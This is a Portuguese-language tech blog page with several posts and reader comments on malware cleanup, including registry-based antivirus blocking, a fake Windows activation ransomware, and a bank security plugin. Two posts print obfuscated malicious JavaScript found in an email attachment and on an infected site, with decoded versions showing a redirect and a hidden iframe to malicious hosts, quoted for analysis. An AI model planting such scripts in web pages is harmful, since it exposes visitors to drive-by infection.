    Digo que aparentemente resolveu porque não posso afirmar com certeza se era isso que era verificado e disparava o bloqueio, mas desde que fiz essas mudanças, nunca mais fui bloqueado.

    A configuração da VM: VMWare player 7.1.4 build-3848939; Win 7 32-bit; Módulo de proteção CEF 3.12.0.2; Firefox 49.0.2; rede configurada em modo bridge (não lembro exatamente por que configurei assim, e não em NAT, mas enfim); resolução do vídeo: 1280×720 (acredito que qualquer valor “real” funcione).

  • VR5 - 397 Comentários
    07/02/2018 at 13:55 · Responder

    Jefferson e colegas: alguém mais está detectando um “novo problema” com o plugin? Depois de uma atualização do W10 (uma cumulativa + uma do Flash Player) quando vamos reiniciar/ligar o PC ele carrega mais de 50 janelas do Internet Explorer! Alguns PCs mais antigos chegam a travar e é uma briga para fechar todas elas! E isso TEM que ser algo com o plugin porque aqui na empresa onde trabalho o problema só apareceu nos PCs que acessam o BB. E agora no meio-dia atualizei meu PC de casa (onde TAMBÉM acesso o BB) e deu o mesmo problema!!! Já desinstalei, instalo de novo mas o problema persiste… :rtfm:

    • Jefferson - 6.606 Comentários
      07/02/2018 at 14:09 · Responder

      Esse problema eu ainda não vi.

      • VR5 - 397 Comentários
        08/02/2018 at 9:49 · Responder

        Sabe o que acontece? Quando fui desligar um computador ontem abri o Gerenciador de Tarefas e em “Processos em segundo plano” tinha quase 10 “Internet Explorer” carregados. Fechei eles manualmente e daí reiniciou normalmente. Mesma coisa com a máquina de uma usuária do financeiro que depois de um tempo tinha que reiniciar porque o Warsaw parava de funcionar e ela tinha que reiniciar: fui no “Gerenciador…” e fechai todos os IE em segundo plano. Daí ela conseguiu acessar o Office Banking do BB sem reiniciar… :huh:

        • VR5 - 397 Comentários
          10/02/2018 at 12:29 · Responder

          Ontem nem fechando todas as instâncias em segundo plano do IE consegui acessar o BB. Reiniciei minha máquina e… acessei! :(

  • Eduardo - 1 Comentário
    03/04/2018 at 23:53 · Responder

    Quatro anos insistindo no erro! É impressionante a incompetência em Segurança da Informação dos bancos brasileiros. Ou… há algum interesse em instalar esse cavalo de tróia nos computadores dos usuários.

    • Jefferson - 6.606 Comentários
      05/04/2018 at 22:05 · Responder

      A Gas Informática foi adquirida pela Diebold, mesma empresa que fabrica as urnas eletrônicas brasileiras. Embora isso faça sentido, dá pra imaginar um monte de teorias conspiratórias a respeito.

  • Lucas - 1 Comentário
    19/03/2019 at 10:42 · Responder

    Estou lascado! Não entendo nada de computadores e preciso solucionar esse problema, utilizamos o BB e Caixa para acompanhar o financeiro da empresa e meu computador não presta pra mais nada. Como resolver? Se é que exista alguma solução! Infelizmente preciso utilizar esses dois bancos.

Clique para comentar
(Prefira clicar em "Responder" se estiver comentando um comentário)

Deixe um comentário

Você pode usar estas tags HTML

<a href="" title=""> <abbr title=""> <acronym title=""> <b> <blockquote cite=""> <cite> <code class="" title="" data-url=""> <del datetime=""> <em> <i> <q cite=""> <s> <strike> <strong> <pre class="" title="" data-url=""> <span class="" title="" data-url="">

  

  

  

:) :( ;) O_o B) :lol: :huh: :S :D :-P 8-O :yahoo: :rtfm: :dashhead1: :clapping: more »

Avast antivirus impedido de executar por uma diretiva de segurança

Jefferson, 19 de julho de 2014,

Eu acredito que já comentei antes, aqui mesmo ou no Buzz, sobre como malware vem bloqueando a execução de antivirus através da corrupção dos descritores de segurança (NTFS) do diretório. Ontem eu esbarrei em um método mais sutil mas igualmente eficaz: aplicar uma diretiva de segurança no Registro que impeça o software de rodar.

É claro que isso só é possivel se o malware estiver rodando com privilégios de administrador, o que é a situação da grande maioria dos usuários no Windows XP e depende de um descuido do usuário no Vista em diante. Coisa muito fácil ocorrer.

Eu já havia eliminado manualmente a infecção da máquina quando esbarrei nesse problema. Se você não remover o malware antes, fazer o que está explicado aqui pode ser perda de tempo.

Sintomas

O ícone do Avast não aparecia na barra de tarefas mas o diretório estava lá, com aparentemente todos os arquivos e acessível para inspeção. Uma checagem com o Autoruns mostrou que o Avast estava configurado para ser executado, mas não rodava.

O HDD do cliente era FAT32, logo o problema dos descritores de segurança NTFS não se aplicava.

Desinstalei o Avast. Toda a desinstalação correu bem exceto por uma estranha mensagem dizendo que regsrv32.exe, no diretório do Avast, não podia ser executado devido a uma diretiva de restrição de software. Fui olhar o diretório e este estava vazio. Até esse ponto eu ainda não havia entendido o que estava ocorrendo.

Por precaução, rodei também o desinstalador completo do Avast. Nenhum erro foi exibido.

Mas depois de reinstalar o Avast o problema persistiu. O programa não rodou após a instalação, mesmo após reiniciar o PC. Nenhuma mensagem de erro era exibida.

Decidi executar manualmente e foi somente então que eu descobri o que estava ocorrendo. Assim que eu tentei rodar AvastUI.exe, foi exibida a mesma mensagem que eu havia visto antes a respeito de regsrv32.exe, mas indicando que desta vez AvastUI.exe é que estava bloqueado por uma diretiva de restrição de software. O diretório inteiro devia estar bloqueado.

“O Windows não pode abrir este programa devido a uma diretiva de restrição de software”

A mensagem também dizia que eu olhasse no log de eventos para mais informações. Eu olhei e não vi nada que parecesse útil.

Executei secpol.msc (é um programa nativo do Windows XP professional) e procurei por uma diretiva bloqueando o Avast. Não achei nada. Pior que isso, secpol.msc dizia “Nenhuma diretiva de restrição de software definida”.

secpol_SoftwarePolicies_NoPolicies_ryan.com.br

Ou eu estava procurando no lugar errado ou era mais um caso onde o malware consegue fazer algo e esconder isso da GUI do Windows.

A solução

Então eu fui olhar manualmente no Registro. Depois de procurar onde eu supunha que ia achar as diretivas e não achar nada, decidi fazer uma busca por todas as referências a AvastUI.exe. Encontrei algo suspeito em

HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\Paths

Veja o conteúdo completo do backup que fiz antes de fazer modificações:

Apesar de não haver nenhuma indicação nessa chave de que se tratava de um bloqueio, achei suspeito que existisse referência aos dois antivirus que estavam instalados na máquina (eu já havia desinstalado o Norton por também não estar funcionando). Fiz o backup, apaguei todas as chaves exceto a última (a que não faz referência a nenhum diretório) e reiniciei o PC. Problema resolvido.

Note que uma das chaves faz referência a todos os executáveis do diretório Avast através de coringa (*.exe). Então eu tive sorte de encontrar procurando por AvastUI.exe.

A razão para isso não aparecer em secpol.msc? Eu fiz um pequeno teste aqui e constatei que, para decidir o que bloquear, o Windows somente olha as chaves sob a chave indicada aqui. Mas na hora de listar, ele começa por outra chave onde ele espera encontrar “links” para essas. Como o malware somente cria as mostradas aqui, as diretivas ficam “invisíveis” para a ferramenta nativa.

19 de julho de 2014 | Tags: | Categorias: Sem categoria | %
7 comentários
  • Everaldo Alvarenga - 1 Comentário
    20/08/2014 at 10:17 · Responder

    Obrigado pelas informações, resolveu o meu problema que tenho o avast pago e nem o suporte deves havia conseguido resolver, apenas me mandaram desinstalar pelo modo de segurança e reinstalar desativando firewall e verificar se o usuário era adm do sistema.
    Muito obrigado

  • Daniel - 1 Comentário
    15/10/2014 at 14:37 · Responder

    Muito bom obrigaduuuuu!

  • Tiago - 1 Comentário
    06/01/2015 at 19:16 · Responder

    vlw tava com o mesmo problema e ao reinicia o pc ele voltou ao normal. exatamente isso q vc falo só esqueceu de fala pra acha os registros executar>regedit

  • Guilherme - 1 Comentário
    14/05/2015 at 18:08 · Responder

    Resolveu o meu problema com o AVG. Obrigado.

  • Jefferson - 6.606 Comentários
    27/07/2015 at 6:56 · Responder

    Eu esqueci de registrar que a longa seqüência alfanumérica no último “ItemData” é apenas uma forma codificada da string:

    %HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders\Cache%OLK*

    Se você olhar pelo Regedit, é essa string que você vai ver. Mas o tipo de dado é REG_EXPAND_SZ e por isso quando é exportado para um arquivo .reg, a string é salva assim. A codificação é simples: cada dois bytes correspondem a um caractere ASCII codificado em hexadecimal. “25,00,48,00,4b,00” = “%HK”

  • lauro barros - 1 Comentário
    20/01/2016 at 10:37 · Responder

    muito bom Jefferson…voce é o cara… também consegui liberar meu avast bloqueado com essas dicas de edição do registro.. li diversos post , todos muito confusos, precisando instalar outros programas, etc.. etc…

  • Idinho - 1 Comentário
    03/03/2016 at 8:50 · Responder

    Cara você é fera, funcionou perfeitamente, obrigadoo!

Clique para comentar
(Prefira clicar em "Responder" se estiver comentando um comentário)

Deixe um comentário

Você pode usar estas tags HTML

<a href="" title=""> <abbr title=""> <acronym title=""> <b> <blockquote cite=""> <cite> <code class="" title="" data-url=""> <del datetime=""> <em> <i> <q cite=""> <s> <strike> <strong> <pre class="" title="" data-url=""> <span class="" title="" data-url="">

  

  

  

:) :( ;) O_o B) :lol: :huh: :S :D :-P 8-O :yahoo: :rtfm: :dashhead1: :clapping: more »

Meu provedor de hospedagem acusou malware no meu fórum.

Jefferson, 03 de março de 2012, ,

É dureza lidar com os falsos positivos dos antivírus.

Hoje a Hostgator me mandou uma mensagem de violação do TOS dizendo ter encontrado malware na minha conta. Por um instante eu fiquei preocupado, porque só me faltava outro incidente como a massiva infecção causada por Krisbarteo em maio de 2009. Mas uma rápida olhada na explicação me deixou aliviado. Uma grande quantidade de antivirus está marcando como malware um simples arquivo batch usado para remover o Gbplugin. Apenas cinco linhas de texto em um arquivo .cmd

movefile.exe C:\PROGRA~1\GBPLUGIN\bb.gpc “”
movefile.exe C:\PROGRA~1\GBPLUGIN\gbieh.dll “”
movefile.exe C:\PROGRA~1\GBPLUGIN\gbieh.gmd “”
movefile.exe C:\PROGRA~1\GBPLUGIN\gbpdist.dll “”
movefile.exe C:\PROGRA~1\GBPLUGIN\GbpSv.exe “”

E olha que o arquivo “malicioso” estava dentro de um arquivo RAR.

Relatório do Virustotal para esse “perigoso” arquivo

Por um lado, é interessante ver mais empresas trabalhando ativamente para conter a praga do malware. Por outro lado, se torna necessário tomar medidas para que sites técnicos onde se discute código malicioso não acabem sendo penalizados com remoção de arquivos, bloqueio de acesso ou blacklisting. No mínimo, é preciso criptografar os arquivos sabidamente maliciosos com senha pública para evitar a detecção  automática

03 de março de 2012 | Tags: , | Categorias: Sem categoria | %
Clique para comentar
(Prefira clicar em "Responder" se estiver comentando um comentário)

Deixe um comentário

Você pode usar estas tags HTML

<a href="" title=""> <abbr title=""> <acronym title=""> <b> <blockquote cite=""> <cite> <code class="" title="" data-url=""> <del datetime=""> <em> <i> <q cite=""> <s> <strike> <strong> <pre class="" title="" data-url=""> <span class="" title="" data-url="">

  

  

  

:) :( ;) O_o B) :lol: :huh: :S :D :-P 8-O :yahoo: :rtfm: :dashhead1: :clapping: more »

R$15 para ativar o Windows Seven

Jefferson, 13 de janeiro de 2012, ,

Ao chegar ao cliente ontem me deparei com uma situação familiar que logo ficou bizarra. Era o Windows Seven acusando não ser uma cópia original logo ao iniciar. Porém ao contrário do que eu estava acostumado a ver, não havia opção para continuar usando o computador. Se eu não quisesse fazer a ativação, o computador era desligado.

Então eu prestei atenção às mensagens e a verdadeira natureza do que eu estava enfrentando ficou evidente. A primeira mensagem dizia:

“Seus documentos estão agora criptografados…”

E não existe a menor chance da Microsoft fazer uma m**da dessas.

A segunda mensagem dizia;

“Ative o seu Windows agora por apenas R$15”

E também não existe a menor chance da MS cobrar tão barato pelo Windows!

Digitei CTR-ALT-DEL para abrir o Gerenciador de Tarefas e encontrei um processo estranho “xplorer.exe”, que ao ser finalizado fazia a mensagem desaparecer. Usando o comando Executar do Gerenciador abri o Autoruns no meu pendrive e pude constatar que o tal xplorer.exe estava sendo executado como “Shell” na inicialização, por isso o usuário perdia totalmente o uso da máquina. Usando o próprio Autoruns eu desativei a chamada ao malware e reiniciei.

Problema resolvido.

Ao ver o ícone do programa malicioso o filho do cliente admitiu que havia executado aquilo achando que fosse um CD de música baixado do 4shared.

13 de janeiro de 2012 | Tags: , | Categorias: Sem categoria | %
2 comentários
  • Saulo Benigno - 279 Comentários
    13/01/2012 at 14:49 · Responder

    Essa é totalmente nova, uau… deve ter tanta gente que paga os 15 reais para ter seu Windows “original”, impressionante.

    Fiquei curioso para onde leva, onde você compra, paga, etc… quais os sites. Como é feito o pagamento.

  • wagnerferreira - 129 Comentários
    14/01/2012 at 13:29 · Responder

    Essa eu também nunca vi. Mas tenho que admitir que é bem bolado. Tem muito usuário “burro” por aí ainda.

Clique para comentar
(Prefira clicar em "Responder" se estiver comentando um comentário)

Deixe um comentário

Você pode usar estas tags HTML

<a href="" title=""> <abbr title=""> <acronym title=""> <b> <blockquote cite=""> <cite> <code class="" title="" data-url=""> <del datetime=""> <em> <i> <q cite=""> <s> <strike> <strong> <pre class="" title="" data-url=""> <span class="" title="" data-url="">

  

  

  

:) :( ;) O_o B) :lol: :huh: :S :D :-P 8-O :yahoo: :rtfm: :dashhead1: :clapping: more »

[BUZZ] O Avast está encontrando um trojan horse no meu Buzz. E não está completamente errado.

Jefferson, 28 de setembro de 2010,

O Avast está encontrando um trojan horse no meu Buzz. E ele não está completamente errado :)

Eu não havia percebido porque uso o Firefox, mas se você abrir este post no Internet Explorer:

http://www.google.com/buzz/117578158927571476541/S7ArvgwkA6k/

O Avast vai acusar o trojan JS:ScriptPE-inf [trj] e bloquear o acesso.

Nota: do jeito que está no meu post, o código do trojan é inofensivo, desde que você não clique nos links dele. O Avast está se baseando pela "assinatura" do vírus, sem notar que ela está apenas sendo exibida para análise.

28 de setembro de 2010 | Tags: | Categorias: BUZZ | %
2 comentários
Clique para comentar
(Prefira clicar em "Responder" se estiver comentando um comentário)

Deixe um comentário

Você pode usar estas tags HTML

<a href="" title=""> <abbr title=""> <acronym title=""> <b> <blockquote cite=""> <cite> <code class="" title="" data-url=""> <del datetime=""> <em> <i> <q cite=""> <s> <strike> <strong> <pre class="" title="" data-url=""> <span class="" title="" data-url="">

  

  

  

:) :( ;) O_o B) :lol: :huh: :S :D :-P 8-O :yahoo: :rtfm: :dashhead1: :clapping: more »

[BUZZ] Até clicar em arquivos HTML está perigoso

Jefferson, 24 de setembro de 2010, ,

Hoje eu recebi duas mensagens muito estranhas, que passaram pelo filtro do Gmail, com um anexo em HTML. Visualizando o anexo no Google Docs parecia perfeitamente “seguro”, mas eu sabia que se tratava de alguma pilantragem. Salvei o anexo no HDD e dei uma olhada no código fonte.

Entre uma frase e outra visível, isso estava escondido:

<script>if(frames){if(top.frames.length>0)top.location.href=self.location;}</script><script language=JavaScript>document.write(unescape(‘%3Cme%74a h%74tp%2Deq%75iv%3D%22r%65fr%65sh%22 co%6Ete%6Et%3D%220%3B%75rl%3Dht%74p%3A%2F%2Fg%72ad%75at%69on%6Fut%66it%74er%73%2Ec%6F%2Ez%61%2F1%2Eht%6Dl%22 %2F%3E%0D%0A%3Ct%61bl%65 wi%64th%3D%221%300%25%22 bo%72de%72%3D%22%30%22%3E%3Ctr %62gc%6Flo%72%3D%22%2355%3668%38%22 a%6Cig%6E%3D%22%63en%74er%22%3E%3C%74d%3E%3Ca h%72ef%3D%22h%74tp%3A%2F%2F%77ww%2Epu%6Cls%6Fft%2Eco%6D%2Fh%74ml%70ow%65r%2E%68tm%22%3E%3C%66on%74 fa%63e%3D%22Ar%69al%2C He%6Cve%74ic%61%2C s%61ns%2Dse%72if%22 co%6Cor%3D%22#%46FF%46FF%22 si%7Ae%3D%22%2D1%22%3ET%68is %57eb %50ag%65 wa%73 pr%6Fte%63te%64 by %48TM%4CPo%77er%2C Cl%69ck %68er%65 to %52eg%69st%65r%3C%2Ffo%6Et%3E%3C%2Fa%3E%3C%2F%74d%3E%3C%2Ft%72%3E%3C%2Fta%62le%3E%0D%0A’))</script>

Eu não tive paciência para decodificar tudo, mas se você tiver alguma noção de caracteres de escape e olhar com cuidado após “unescape” verá que isso começa injetando no browser “<meta http equiv refresh…”

Ou seja, é pilantragem mesmo. Não sei ainda o objetivo, mas até clicar em arquivos html está perigoso.

Liked by: Henzo M. F. Gomes, Roberto Acioli

24 de setembro de 2010 | Tags: , | Categorias: BUZZ | %
2 comentários
  • Jefferson - 6.606 Comentários
    24/09/2010 at 3:08 · Responder

    Descobri como "ler" o que está escrito aí sem esforço. Basta colar o texto de unescape nesta página:

    http://www.linkedresources.com/tools/unescaper_v0.2b1.html

    E clicar em unescape. O resultado é este (não clique nos links!):

    <meta http-equiv="refresh" content="0;url=http://graduationoutfitters.co.za/1.html" />

    <table width="100%" border="0"><tr bgcolor="#556688" align="center"><td><a href="http://www.pullsoft.com/htmlpower.htm"><font face="Arial, Helvetica, sans-serif" color="#FFFFFF" size="-1">This Web Page was protected by HTMLPower, Click here to Register</font></a></td></tr></table>

    O engraçado é que tudo dentro de <table> </table> parece ter sido inserido por acidente. Script-kiddie em ação?

    Fazer seu browser dar um refresh e abrir "graduationoutfitters.co.za" (não clique!) é que é a parte perigosa da coisa.

  • Kaio Maia S.O. -
    04/10/2010 at 19:56 · Responder

    eu recebi um email do google ferramentas para webmaster que um site meu bem antigo tinha sido infectado, e o código também estava desse jeito, veja:

    <script>eval(unescape('%64%6F%63%75%6D%65%6E%74%2E%77%72%69%74%65%28%27%3C%69%66%72%61%6D%65%20%73%72%63%3D%22%68%74%74%70%3A%2F%2F%70%6F%64%66%65%72%2E%63%6F%6D%2F%3F%35%35%35%33%34%33%22%20%77%69%64%74%68%3D%31%20%68%65%69%67%68%74%3D%31%3E%3C%2F%69%66%72%61%6D%65%3E%27%29'));</script>

    descriptografando fica assim:

    <script>eval(unescape('document.write('<iframe src="http://podfer.com/?555343" width=1 height=1></iframe>')'));</script>

    como ja foi dito: NÃO CLIQUEM NOS LINKS ^^

Clique para comentar
(Prefira clicar em "Responder" se estiver comentando um comentário)

Deixe um comentário

Você pode usar estas tags HTML

<a href="" title=""> <abbr title=""> <acronym title=""> <b> <blockquote cite=""> <cite> <code class="" title="" data-url=""> <del datetime=""> <em> <i> <q cite=""> <s> <strike> <strong> <pre class="" title="" data-url=""> <span class="" title="" data-url="">

  

  

  

:) :( ;) O_o B) :lol: :huh: :S :D :-P 8-O :yahoo: :rtfm: :dashhead1: :clapping: more »

« Posts mais recentes